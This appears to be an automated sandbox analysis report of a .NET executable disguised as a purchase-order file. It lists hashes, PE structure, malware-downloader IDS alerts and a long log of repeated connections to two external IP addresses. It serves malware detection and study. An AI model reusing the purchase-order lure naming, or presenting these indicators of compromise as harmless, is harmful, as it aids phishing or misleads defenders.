                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):7.700512393501766
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            File name:PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            File size:792'064 bytes
                                                                                                                                            MD5:4b393b41e5b7bdd02e481816bec9ff4a
                                                                                                                                            SHA1:35b60bdfa5130cc88b508f4fee9c226a2277517b
                                                                                                                                            SHA256:b71fb82589e3532a9390352bc87f7c2edc2cd7fae723fe203500350a31559e17
                                                                                                                                            SHA512:28ae160172d1d13a8b56dac51dd38f44c1cbf2c4755300d34adfc5c5638ee2375bc7cf8b29e8173933f0f3e672cd2e8e8469fa341e3356a0c7e34153e08ac0e3
                                                                                                                                            SSDEEP:12288:ipdY9shQgZCnoCKpJTH7uag0rQ8Vt7W68RNkBXKU5YYyTAo187Ce6m05/W:WdhlyzKrHSaVrQ8i6UkxKVaSR7m05/
                                                                                                                                            TLSH:34F401A4BB5ED403C99116354EB1F2B912689E9DF912E213AFED7FEF7C726051C04282
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tpVg..............0......(........... ... ....@.. ....................................@................................
                                                                                                                                            Icon Hash:17692632b3936907
                                                                                                                                            Entrypoint:0x4c0b9a
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x67567074 [Mon Dec 9 04:22:12 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                            Instruction
                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                            push ebx
                                                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                                                            jnc 00007F9F8CCDC0D2h
                                                                                                                                            je 00007F9F8CCDC0D2h
                                                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                                                            add byte ptr [ecx+00h], al
                                                                                                                                            arpl word ptr [eax], ax
                                                                                                                                            je 00007F9F8CCDC0D2h
                                                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                                                            je 00007F9F8CCDC0D2h
                                                                                                                                            outsd
                                                                                                                                            add byte ptr [edx+00h], dh
                                                                                                                                            push ebx
                                                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                                                            jnc 00007F9F8CCDC0D2h
                                                                                                                                            je 00007F9F8CCDC0D2h
                                                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                                                            add byte ptr [edx+00h], dl
                                                                                                                                            add byte ptr [esi+00h], ah
                                                                                                                                            insb
                                                                                                                                            add byte ptr [ebp+00h], ah
                                                                                                                                            arpl word ptr [eax], ax
                                                                                                                                            je 00007F9F8CCDC0D2h
                                                                                                                                            imul eax, dword ptr [eax], 006E006Fh
                                                                                                                                            add byte ptr [ecx+00h], al
                                                                                                                                            jnc 00007F9F8CCDC0D2h
                                                                                                                                            jnc 00007F9F8CCDC0D2h
                                                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                                                            bound eax, dword ptr [eax]
                                                                                                                                            insb
                                                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            dec esp
                                                                                                                                            add byte ptr [edi+00h], ch
                                                                                                                                            popad
                                                                                                                                            add byte ptr [eax+eax+00h], ah
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc0b480x4f.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc20000x2494.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x20000xbec000xbec00b95fee5d01a10176963a0d2019778c63False0.9048190735583224data7.706025892082417IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0xc20000x24940x26004e3683f04d99df1c22412649b3c85bd6False0.8695518092105263data7.40354604986483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .reloc0xc60000xc0x200b01ee0c30b57c1b6e4b394553ef35dd8False0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0xc21000x1e7ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9827056110684089
                                                                                                                                            RT_GROUP_ICON0xc3f900x14data1.05
                                                                                                                                            RT_VERSION0xc3fb40x2e0data0.45108695652173914
                                                                                                                                            RT_MANIFEST0xc42a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                            DLLImport
                                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-12-16T14:14:14.630603+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734132.226.8.16980TCP
                                                                                                                                            2024-12-16T14:14:17.427453+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449734132.226.8.16980TCP
                                                                                                                                            2024-12-16T14:14:19.127433+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449737172.67.177.134443TCP
                                                                                                                                            2024-12-16T14:14:20.739935+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.8.16980TCP
                                                                                                                                            2024-12-16T14:14:24.224485+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740132.226.8.16980TCP
                                                                                                                                            2024-12-16T14:14:29.738608+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449747172.67.177.134443TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 16, 2024 14:14:12.534327030 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:12.654289961 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:12.654377937 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:12.654731989 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:12.778023005 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:14.085479975 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:14.090220928 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:14.210628986 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:14.581480026 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:14.630603075 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:15.196969986 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:15.197043896 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:15.197119951 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:15.203994036 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:15.204020023 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.422904968 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.422980070 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.429271936 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.429311991 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.429796934 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.474311113 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.502167940 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.547338009 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.867811918 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.867974043 CET44349736172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:16.868031025 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.876677036 CET49736443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:16.880996943 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:17.003663063 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:17.371956110 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:17.427453041 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:17.458198071 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:17.458288908 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:17.458383083 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:17.460922003 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:17.460957050 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:18.682228088 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:18.684091091 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:18.684139013 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:19.127551079 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:19.127716064 CET44349737172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:19.127787113 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:19.128324032 CET49737443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:19.132004976 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:19.132891893 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:19.252449036 CET8049734132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:19.252619028 CET4973480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:19.252701044 CET8049738132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:19.252799988 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:19.252991915 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:19.372721910 CET8049738132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:20.684659958 CET8049738132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:20.686146975 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:20.686216116 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:20.686280012 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:20.686542988 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:20.686556101 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:20.739934921 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:21.901217937 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:21.904020071 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:21.904067039 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:22.354146957 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:22.354233980 CET44349739172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:22.354290009 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:22.354865074 CET49739443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:22.359209061 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:22.360280037 CET4974080192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:22.479409933 CET8049738132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:22.479507923 CET4973880192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:22.480006933 CET8049740132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:22.480077028 CET4974080192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:22.480211020 CET4974080192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:22.599971056 CET8049740132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:24.170289993 CET8049740132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:24.172075987 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:24.172123909 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:24.172281981 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:24.172570944 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:24.172585011 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:24.224484921 CET4974080192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:25.384879112 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:25.388931036 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:25.388956070 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:25.830611944 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:25.830689907 CET44349742172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:25.830749035 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:25.831362009 CET49742443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:25.836393118 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:25.956254959 CET8049744132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:25.956368923 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:25.956545115 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:26.076385975 CET8049744132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:28.073029041 CET8049744132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:28.077423096 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:28.077518940 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:28.077625036 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:28.077990055 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:28.078021049 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:28.130594015 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.292520046 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.311544895 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:29.311604977 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.738651037 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.738755941 CET44349747172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.738944054 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:29.739451885 CET49747443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:29.744330883 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.745856047 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.864676952 CET8049744132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.864741087 CET4974480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.865705013 CET8049749132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:29.865777016 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.866035938 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:29.985642910 CET8049749132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:31.830570936 CET8049749132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:31.832222939 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:31.832272053 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:31.832329988 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:31.832628012 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:31.832638979 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:31.880578995 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.047177076 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.049370050 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:33.049410105 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.497531891 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.497612000 CET44349751172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.497674942 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:33.498226881 CET49751443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:33.502147913 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.502907038 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.622400045 CET8049749132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.622668028 CET4974980192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.622672081 CET8049752132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:33.622750044 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.623092890 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:33.742841959 CET8049752132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:35.948550940 CET8049752132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:35.950184107 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:35.950248003 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:35.950356007 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:35.950653076 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:35.950665951 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:35.990019083 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.165061951 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.174299955 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:37.174341917 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.616405010 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.616481066 CET44349753172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.616524935 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:37.616940975 CET49753443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:37.620337963 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.621392965 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.743294001 CET8049752132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.743415117 CET4975280192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.743433952 CET8049754132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:37.743510008 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.743743896 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:37.865283012 CET8049754132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:39.210098028 CET8049754132.226.8.169192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:39.211745977 CET49755443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:39.211831093 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:39.211905003 CET49755443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:39.212198973 CET49755443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:39.212213039 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:39.255673885 CET4975480192.168.2.4132.226.8.169
                                                                                                                                            Dec 16, 2024 14:14:40.435746908 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:40.437427044 CET49755443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:40.437468052 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:40.883368969 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:40.883487940 CET44349755172.67.177.134192.168.2.4
                                                                                                                                            Dec 16, 2024 14:14:40.883579016 CET49755443192.168.2.4172.67.177.134
                                                                                                                                            Dec 16, 2024 14:14:40.890105963 CET49755443192.168.2.4172.67.177.134
